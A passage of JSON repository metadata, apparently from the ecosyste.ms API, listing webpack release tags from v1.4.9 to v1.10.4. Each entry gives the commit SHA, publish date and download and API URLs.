bpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v